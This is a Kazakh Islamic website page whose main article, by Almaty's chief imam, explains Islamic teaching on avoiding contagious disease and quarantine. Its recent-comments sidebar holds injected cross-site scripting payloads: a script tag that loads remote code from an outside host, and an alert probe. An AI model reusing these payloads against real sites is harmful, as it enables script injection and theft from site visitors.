Пайғамбар медицинасы: вирустан қорғану жолдары
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 17:49
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

Пайғамбар медицинасы: вирустан қорғану жолдары

| A | +

Ислам адам өміріне қауіп төндіретін кез келген зиянкестен сақтануға, тосын, зиянды әрекеттерге бармауға үндейді. Өйткені, Алла Тағала адам баласына өмір мен денсаулықты аманат етіп берген. Ал адамның мұндай құндылықтардың қадірін біліп, оны сақтауы – шариғаттың асыл мақсаттарынан.

 

Бұл жайында Алла Тағала Құран Кәрімде:   «Өз-өздеріңді қауіп-қатерге тікпеңдер» («Бақара» сүресі, 195-аят), «Өз-өздеріңді өлтірмеңдер» («Ниса сүресі, 29-аят) деп ашық баяндайды. Сондықтан адам өміріне қауіп төндіретін жұқпалы аурулар мен індет-кеселдерден сақтанбау мен аурудың алдын алмау да өз басын қатерге тіккенмен тең. Осы ретте ислам дінінде келген және Ардақты Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) бұйырған түрлі жұқпалы аурулардан сақтанудың бірнеше жолына тоқталып өткенді жөн көріп отырмыз.

 

Жұқпалы ауруға шалдыққан адамға қатысты тыйымдар:

Бірінші, сырқат адам қолынан келген барлық мүмкіндікті пайдаланып, өзіне жұққан аурудан арылуға күш салуы тиіс. Егер науқас адам дертінің дауасын іздемесе, меңдеген дертінен жазылуға ұмтылмаса, ол күнәһар болып есептеледі.

Екінші, өзіне індет жұққанын білген науқас сол ауруды өзгелерге жұқтырмауы шарт. Яғни жұқпалы ауруға шалдыққан адам өзгелермен қойын-қолтық араласу, жақыннан сөйлесу, қол алып амандасу, құшақтасу секілді іс-әрекеттерге бармауы лазым.

Үшінші, науқас адам мәжбүрлі жағдайда болмаса, өзінің тұрып жатқан жерінен басқа елдімекенге қоныс аудармауы тиіс. Егер де ол басқа жерге қоныс аударатын болса, аурды басқаларға да жұқтыры сөзсіз. Бұған шариғатта қатаң тиым салынған. Тіпті Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) бір хадисінде: «Қандай да бір жерде оба ауруы шыққанын естісеңдер, ол жерге бармаңдар. Тұрған жерлеріңде тараған болса, ол жерден шықпаңдар» (Бұхари, Муслим) деп қатаң ескерткен.

 

Жұқпалы ауру меңдеген кездегі сау адамға қатысты тыйымдар:

Бірінші, сау адам науқас адамның көңіліне тимейтіндей сыпайы қарым-қатынаста болғаны дұрыс. Яғни, науқас адамның көзінше қарқылдап күлуге, көңіліне келетін ауыр сөздер айтуға, шектен тыс әзілдесуге болмайды.

Екінші, сау адам науқас адаммен қарым-қатынасқа түскенде, сөйлескенде барынша медициналық сақтық шараларын қолдандануы керек. 

Жоғарыда келген тиымдар жұқпалы ауру туындаған кездегі сау адам мен науқас адамның практикалық жадынамасы деуге болады.

 

Ислам дінінің қандай да бір ауру туындаған кезде адамның сеніміне қатысты үкімдері:

Бірінші, жұқпалы ауруға шалыққан адам Алланың берген тағдырына, басына салған сынағына разы болып, мол сауаптан үміт етіп, дертіне шипа сұрап, дұға етуі тиіс.

Екінші, жұқпалы ауру тараған кезде науқас емес адам ештеңеден қорықпай, барлық сақтық шарасын қарастыра отырып, бір Аллаға тәуекел етуі керек. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) бір хадисінде: «Жұқпалы ауру да жоқ, ырымға сену де жоқ» десе, тағы бір хадисінде «Алапес ауруынан арыстаннан қашқандай қашыңдар» деп бұйырады. Екі хадис сырттай бір-біріне қарама-қарсы мәнде айтылғандай көрінгенімен, ақиқатында жұқпалы ауру, біріншіден, адам баласына Алланың тағдырмен жұғатынын меңзесе, екіншіден, жұқпалы аурудан сақтану керек дегенді білдіреді.

 

Сөзімізге тұздық болу үшін Ислам тарихындағы екінші халифа хазіреті Омардың (р.а.) жолаушылап бара жатқан қаласында жұқпалы індеттің шыққанын естігені туралы оқиғаны айтсақ жеткілікті.

Әлгіндегі суыт хабарды жолда естіген Омар (р.а.) әскербасылармен ақылдаса келе кері қайтуға шешім қабылдайды. Сонда сахаба Әбу Үбәйда ибн Жәррах (р.а.) одан:

– Алланың тағдырынан қашып барасың ба? – деп сұрайды.

– Иә, Алланың тағдырынан қашып, Алланың тағдырына бара жатырмын. Егер де сенің түйелерің болса, ал алдыңнан бір жағының шөбі шүйгін, екінші жағы сортаң жайылым кезіксе, түйелеріңді қалауыңмен шөбі шүйгін жағына жайсаң да, Алланың тағдырымен, сортаң жағына жайсаң да Алланың тағдырымен жайған болмайсың ба? – деген екен. 

 

Бұл оқиға мен жоғарыда келтірген Ислам дінінің жұқпалы ауру тараған кездегі ұстанымдары біздің күніміздегі ауыр жағдайдан жеңіл шығуға, сын-сағаттарда дұрыс шешім қабылдауға, елде орнаған төтенше жағдай мен карантин режимінде аты жаман індеттен сақтануға күш қосады деген сенімдеміз.

    

Еркінбек ШОҚАЙ,

Алматы қаласының бас имамы

Предыдущий Следующий
Сынықтар хикметі Мәтуриди ақида мектебіне шолу

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Сұрақ-жауап Қауіпті жұқпалы індеттен қайтыс болған адамның мәйітін жерлеуге қатысты пәтуа
Аса қамқор, ерекше мейірімді Алланың атымен бастаймын. Барша мадақ әлемдердің Раббысы Аллаға тән. Адамзаттың асылы Мұхаммедке, оның отбасы мен барша сахабаларына салауат пен сәлем болғай! Шариғат бойынша қайтыс болған мұсылманды жуындыру, кебіндеу, оған жаназа намазын оқу және оны жерлеу – парыз киф...
Сұрақ-жауап Тікелей эфир арқылы жұма намазын оқуға бола ма?
Соңғы уақыттарда жаман індеттің тез таралуына байланысты мешіттерімізде жұма, жамағат намаздары тоқтатылды. Мұндай шешімді Қазақстан ғана емес, Түркия, Сауд Арабиясы, Өзбекстан, Қырғызстан, Кувейт, Мысыр сынды әлемнің көптеген мұсылман мемлекеттері қабылдады. ...
Сұрақ-жауап Карантин жайлы шариғат не дейді?
Омар бин Хаттабтың халифалығы кезінде һижраның 18 жылы оба ауруы тарады. Тарихта бұл обаға Амуас обасы деген ат берілген. Амуас – оба шыққан ошақ. Палестинадағы Рамлә мен Байт-Мақдис арасында орналасқан шағын қала....
Сұрақ-жауап Ислам діні жұқпалы дерттен қорғану туралы не айтады?
Ислам діні бір қандай қауіп-қатер болмасын оның алдын алуға, онымен дер кезінде күресуге, індеттің таралмауына баса назар аударады. Хақ діннің үкімдерінің негізгі қорғайтын бес нәрсесі – дін, ақыл, мал-мүлік, ар-намыс пен ұрпақ және адам өмірі («Исра» сүресі, 33-аят) екені белгілі. Алла Тағала Құран...
Сұрақ-жауап Жұлдызнамаға (гороскоп) сенуге бола ма?
Жұлдыздармен тағдырды болжау – сиқыршылыққа жататынын білуіміз керек. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын): «Кімде-кім қандай да бір ақпаратты жұлдызбен болжап алатын болса, ол сиқыршылықтың бір түрімен айналысып жатыр, неғұрлым көп (айналысса), соғұрлым көп (күнә алады)»[2] – дег...
Сұрақ-жауап Құрамында шошқа майы бар дәрі-дәрмектерді пайдалануға бола ма?
Қазіргі таңда көптеген дәрілерге шошқаның ағзаларынан алынатын ферменттер қосылады. Оның басты себебі, шошқаның ұйқы безінен алынатын панкреатин атты фермент (ыдыратушы катализатор) тамақтың тез қортылуына септігін тигізеді....
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 17:49

Бамдатқа дейін 04:11

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
12 сағат. бұрын

О милостыне

"/1

X X
12 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi